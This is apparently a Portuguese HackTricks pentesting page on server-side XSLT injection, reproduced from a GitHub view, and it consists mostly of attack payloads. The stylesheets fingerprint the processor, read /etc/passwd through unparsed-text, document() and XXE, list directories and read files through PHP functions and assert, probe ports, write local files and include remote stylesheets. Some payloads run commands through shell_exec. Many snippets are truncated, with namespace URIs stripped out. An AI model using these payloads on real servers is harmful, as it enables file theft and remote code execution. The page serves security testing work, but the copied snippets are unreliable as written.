Skip to content

Latest commit



418 lines (373 loc) · 16.1 KB

File metadata and controls

418 lines (373 loc) · 16.1 KB

Injeção de Servidor XSLT (Transformações de Linguagem de Folha de Estilo Extensível)

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Informações Básicas

XSLT é uma tecnologia utilizada para transformar documentos XML em diferentes formatos. Ele vem em três versões: 1, 2 e 3, sendo a versão 1 a mais comumente utilizada. O processo de transformação pode ser executado no servidor ou no navegador.

Os frameworks mais frequentemente utilizados incluem:

  • Libxslt do Gnome,
  • Xalan do Apache,
  • Saxon da Saxonica.

Para a exploração de vulnerabilidades associadas ao XSLT, é necessário que as tags xsl sejam armazenadas no lado do servidor, seguido pelo acesso a esse conteúdo. Uma ilustração de tal vulnerabilidade está documentada na seguinte fonte:

Exemplo - Tutorial

sudo apt-get install default-jdk
sudo apt-get install libsaxonb-java libsaxon-java

{% code title="xml.xml" %}

<?xml version="1.0" encoding="UTF-8"?>
<title>CD Title</title>
<artist>The artist</artist>
<company>Da Company</company>

{% endcode %}

{% code title="xsl.xsl" %}

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="">
<xsl:template match="/">
<h2>The Super title</h2>
<table border="1">
<tr bgcolor="#9acd32">
<td><xsl:value-of select="catalog/cd/title"/></td>
<td><xsl:value-of select="catalog/cd/artist"/></td>

{% endcode %}


saxonb-xslt -xsl:xsl.xsl xml.xml

Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
<h2>The Super title</h2>
<table border="1">
<tr bgcolor="#9acd32">
<td>CD Title</td>
<td>The artist</td>

Impressão Digital

{% code title="detection.xsl" %}

<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="">
<xsl:template match="/">
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
<xsl:if test="system-property('xsl:product-name')">
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
<xsl:if test="system-property('xsl:product-version')">
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
<xsl:if test="system-property('xsl:is-schema-aware')">
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
<xsl:if test="system-property('xsl:supports-serialization')">
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
/><br />
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
/><br />

{% endcode %}

E execute

$saxonb-xslt -xsl:detection.xsl xml.xml

Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
<h2>XSLT identification</h2><b>Version:</b>2.0<br><b>Vendor:</b>SAXON from Saxonica<br><b>Vendor URL:</b><br>

Ler Arquivo Local

{% code title="read.xsl" %}

<xsl:stylesheet xmlns:xsl="" xmlns:abc="" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>

{% endcode %}

$ saxonb-xslt -xsl:read.xsl xml.xml

Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
<?xml version="1.0" encoding="UTF-8"?>root:x:0:0:root:/root:/bin/bash


Injeção de Solicitação de Serviço do Lado do Servidor

<xsl:stylesheet xmlns:xsl="" xmlns:abc="" version="1.0">
<xsl:include href=""/>
<xsl:template match="/">


Pode haver mais ou menos funções dependendo da versão XSLT utilizada:

Impressão digital

Faça o upload disso e obtenha informações

<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="">
<xsl:template match="/">
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
<xsl:if test="system-property('xsl:product-name')">
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
<xsl:if test="system-property('xsl:product-version')">
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
<xsl:if test="system-property('xsl:is-schema-aware')">
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
<xsl:if test="system-property('xsl:supports-serialization')">
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
/><br />
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
/><br />


Injeção de Solicitação de Serviço do Lado do Servidor

<esi:include src="" stylesheet="">

Injeção de Javascript

<xsl:stylesheet xmlns:xsl="">
<xsl:template match="/">
<script>confirm("We're good");</script>

Listagem de diretórios (PHP)

Opendir + readdir

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="" xmlns:php="" >
<xsl:template match="/">
<xsl:value-of select="php:function('opendir','/path/to/dir')"/>
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -

Assert (var_dump + scandir + false)

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="" xmlns:php="">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
<br />

Ler arquivos

Interno - PHP

<xsl:stylesheet xmlns:xsl="" xmlns:abc="" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', ‘utf-8')"/>

Interno - XXE

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>
<xsl:stylesheet version="1.0" xmlns:xsl="">
<xsl:template match="/">

Através do HTTP

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="">
<xsl:template match="/">
<xsl:value-of select="document('/etc/passwd')"/>
<!DOCTYPE xsl:stylesheet [
<!ENTITY passwd SYSTEM "file:///etc/passwd" >]>
<xsl:template match="/">

Interno (função PHP)

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="" xmlns:php="" >
<xsl:template match="/">
<xsl:value-of select="php:function('file_get_contents','/path/to/file')"/>
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="" xmlns:php="">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
<br />

Verificação de porta

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="" xmlns:php="" >
<xsl:template match="/">
<xsl:value-of select="document('')"/>

Escrever em um arquivo

XSLT 2.0

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="" xmlns:php="" >
<xsl:template match="/">
<xsl:result-document href="local_file.txt">
<xsl:text>Write Local File</xsl:text>

Extensão Xalan-J

<xsl:template match="/">
<redirect:open file="local_file.txt"/>
<redirect:write file="local_file.txt"/> Write Local File</redirect:write>
<redirect:close file="loxal_file.txt"/>

Incluir XSL externo

Outras maneiras de escrever arquivos no PDF

<xsl:include href="http://extenal.web/external.xsl"/>
<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>

Executar código


<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:php="" >
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','sleep 10')" />
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="" xmlns:php="">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)));')" />
<br />

Executar código usando outros frameworks no PDF

Mais Idiomas

Nesta página você pode encontrar exemplos de RCE em outros idiomas: (C#, Java, PHP)

Acessar funções estáticas PHP de classes

A seguinte função chamará o método estático stringToUrl da classe XSL:

<!--- More complex test to call php class function-->
<xsl:stylesheet xmlns:xsl="" xmlns:php=""
<xsl:output method="html" version="XHTML 1.0" encoding="UTF-8" indent="yes" />
<xsl:template match="root">
<!-- We use the php suffix to call the static class function stringToUrl() -->
<xsl:value-of select="php:function('XSL::stringToUrl','une_superstring-àÔ|modifier')" />
<!-- Output: 'une_superstring ao modifier' -->

Mais Cargas Úteis

Lista de Detecção de Força Bruta

{% embed url="" %}


Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!